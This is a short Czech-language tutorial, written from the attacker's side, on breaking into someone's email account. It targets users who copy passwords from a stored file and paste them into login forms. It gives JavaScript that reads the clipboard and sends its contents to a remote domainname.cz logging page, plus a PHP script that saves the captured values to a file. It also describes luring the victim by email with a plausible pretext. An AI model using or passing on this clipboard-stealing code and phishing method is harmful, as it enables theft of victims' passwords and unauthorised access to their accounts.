Následující postup, kterým je možné dostat se někomu do e-mailové schránky zde dosud nebyl uveden a hodí se k doplnění už publikovaných technik. Předpokládejme následující situaci. Uživatel je dobře poučen o zacházení s hesly a proto si nastavuje pro přístup k e-malovému účtům a dalším službám hesla, která jsou odolné proti útoku typu brute-force. Hesla, která používá se skládají z písmen a číslic a jsou delší než 6 znaků. Dále dodržuje zásadu, že si nikdy nenastavuje stejné heslo k více účtům. Je pravděpodobné, že si takový uživatel všechna ta hesla nepamatuje,a proto je má uložené v nějakém souboru na svém počítači. Při přihlašování přes webové rozhraní si pak soubor s hesly otevře a heslo přesune do políčka přihlašovacího formuláře stiskem CTRL+C a CTFL+V nebo použitím kontextové nabídky kopírovat – vložit. Pomocí jazyka JavaScriptu máme možnost obsah schránky získat. Stačí do webové schránky vložit následující script:
<SCRIPT language="JavaScript">
var content = clipboardData.getData('TEXT');
document.write('<img src="http://www.domainname.cz/
log.php?c=' + escape(content) + '">');
<SCRIPT>
Následně odešleme obětí e-mailovou zprávu, která bude obsahovat odkaz na stránku se scriptem a připojený důvěryhodný důvod, proč má oběť na odkaz kliknout. Script získa obsah schránky z heslem a odešle ho ke zpracování PHP scriptu, který heslo zapíše do souboru. PHP script může v nejjednodušším případě vypadat následovně:
<?php
if (isset($_GET['c'])) {
$fp = fopen("log.txt","a");
fwrite($fp,$_GET['c'] . "\r\n");
fclose($fp);
}
?>
Na závěr dodávám, že uvedený JavaScript bude fungovat pouze v prohlížeči Internet Explorer.